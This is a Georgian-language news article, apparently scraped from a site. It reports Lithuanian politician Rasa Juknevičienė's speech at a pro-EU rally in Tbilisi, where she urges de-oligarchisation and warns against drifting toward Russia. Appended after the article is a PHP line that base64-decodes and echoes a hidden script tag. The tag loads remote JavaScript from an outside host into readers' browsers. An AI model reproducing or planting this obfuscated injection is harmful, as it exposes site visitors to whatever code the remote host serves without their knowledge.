celsiusi
ავერსი საქკაბელი
რუსთაველის გამზირზე ევროინტეგრაციის მხარდასაჭერ აქციაზე "შინ ევროპისკენ", რასა იუკნევიჩიანემ ქართველ ხალხს მიმართა და განაცხადა – გთხოვთ, არ დაუშვათ, რომ თქვენი ლამაზი ქვეყანა დარჩეს იმ ხალხის მძევალი, რომლებიც ძალაუფლების ჩრდილში რჩებიან. ასეთი პოლიტიკა არ მიგიყვანთ ევროკავშირში. ეს არის კრემლისთვის საჩუქარი.
 
მისივე თქმით, ქვეყანას სჭირდება დეოლიგარქიზაცია და ყველამ კარგად იცის რომელ ოლიგარქზეა საუბარი.
 
"ძვირფასო ძმებო და დებო, ვხვდებით ევროპისთვის გადამწყვეტ დროს. ჩვენთან ძალიან ახლოს მამაცი და თავისუფლების მოყვარული უკრაინელები იღუპებიან ყოველდღიურად. სხვას არავის ესმის მათი ბრძოლის ისე, როგორც საქართველოს მოსახლეობას, ან ჩვენ, ლიეტუველებს, უკრაინელები იბრძვიან ჩვენთვისაც, საკუთარი ევროპული ცხოვრებისთვის. ამიტომ დავიწყებ ჩემს მიმართვას უკრაინელი ხალხისადმი მისალმებით - "დიდება უკრაინას". 
 
10 წლის წინ საქართველოს სახელი ასოცირდებოდა ევროპაში ასოცირდებოდა დაუჯერებლად წარმატებულ რეფორმებთან. გაგიზიარებთ ჩემს მაშინდელ შთაბეჭდილებას. მეზობელ სომხეთში ვიზიტის დროს, მახსენდება როგორ მესმოდა იქაური პოლიტიკური ექსპერტების შეფასებები. მაგალითად, ამბობდნენ, რომ საქართველომ შეძლო მექრთამეობის აღმოფხვრა პოლიციაში, რაც მაშინ სამხრეთ კავკასიის ქვეყნებში თითქმის შეუძლებელი მისია იყო. მაშინ ჩანდა, რომ გზა, რომელიც აირჩია საქართველოს ხელისუფლებამ დემოკრატიულ, ევროპულ სახელმწიფოთა ოჯახში ინტეგრირებისთვის, თქვენი პოლიტიკოსების მიერ შენარჩუნდებოდა, ვიდრე წარმატებული დასასრული არ ექნებოდა. ნამდვილად საქართველო დიდი ხმის განმავლობაში იყო ლიდერი რეფორმების კუთხით, აღმოსავლეთ ევროპის პარტნიორობის ყველა ქვეყანას შორის.
 
თუმცა დღეს, როდესაც, უკრაინელებმა სისხლით დაამსხვრიეს ყინული და როდესაც ევროკავშირის ლიდერებმა ამ კვირაში უნდა გადაწყვიტონ კანდიდატის სტატუსის საკითხი, საქართველომ, სამწუხაროდ, დაკარგა ლიდერის სტატუსი. ქვეყნის პოლიტიკა გაივსო სიძულვილით. შესაძლებლობა, რომელიც უზრუნველყო ევროპული საბჭოს პრეზიდენტმა, შარლ მიშელმა, ხელიდან იქნა გაშვებული. ბოლო დროს საქართველოს დემოკრატიულ პროცესებზე მხოლოდ ცუდი ამბები აღწევს ჩვენამდე. ყოფილი პრეზიდენტი, ყველაზე მსხვილი ოპოზიციური მედიის მფლობელი, ციხეში იმყოფებიან. ხორციელდება თავდასხმები სხვა ჟურნალისტებზე, საქართველოს მეგობრებზეც კი ევროპასა და შეერთებულ შტატებში.
 
როგორც ჩანს, თქვენმა მთავრობამ ყველაფერი გააკეთა, რომ ევროკომისიის რეკომენდაცია საქართველოსთვის სასურველი არ ყოფილიყო. გასაკვირი არაა, რომ კომისია ძალიან კრიტიკულია თავის რეკომენდაციაში ამ პრობლემების მიმართ, რაზეც პასუხისმგებლობა საქართველოს დღევანდელ მთავრობას ეკისრება. 
 
კომისია გარკვევით ამბობს ქვეყანას სჭირდება დეოლიგარქიზაცია, ყველამ კარგად იცის რომელ ოლიგარქზეა საუბარი. გთხოვთ, არ დაუშვათ, რომ თქვენი ლამაზი ქვეყანა დარჩეს იმ ხალხის მძევალი, რომლებიც ძალაუფლების ჩრდილში რჩებიან. ასეთი პოლიტიკა არ მიგიყვანთ ევროკავშირში. ეს არის კრემლისთვის საჩუქარი.
 
ძვირფასო ქართველებო დარწმუნებული იყავით, ვითარება უიმედო არ არის. თქვენ გამოხვალთ ამ მდგომარეობიდან. ბევრმა ქვეყანამ, რომელმაც გამოსცადა საბჭოთა რეჟიმი, იმავე პრობლემების წინაშე იდგა, ყველგან არსებობენ, მსგავსი მანიპულატორები, კრემლის მეგობრები. ყველაზე მნიშვნელოვანი ისაა, რომ თითოეულმა თქვენგანმა აიღოს პირადი პასუხისმგებლობა ქვეყნის მომავლის წინაშე. როდესაც დადგებით საარჩევნო ყუთთან, გაიხსენეთ ვინ დასწია საქართველო უკან, რუსეთისკენ. ძალიან კარგად ვიცი რამდენად საშიშია ეს ცვლილება თქვენი ქვეყნისთვის და ყველაფერს გავაკეთებ, რომ საქართველო დარჩეს ევროკავშირის დღის წესრიგში. 
 
მივმართავ ყველა პოლიტიკოსს მმართველ გუნდშიც და ოპოზიციაშიც. თქვენ უნდა აიცილოთ თავიდან მძევლის სტატუსი. იპოვეთ ძალა ძლიერი ევროპული დღის წესრიგისთვის. თქვენი საოცარი ხალხი ამას იმსახურებს",- თქვა იუკნევიჩიანემ.  
556
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");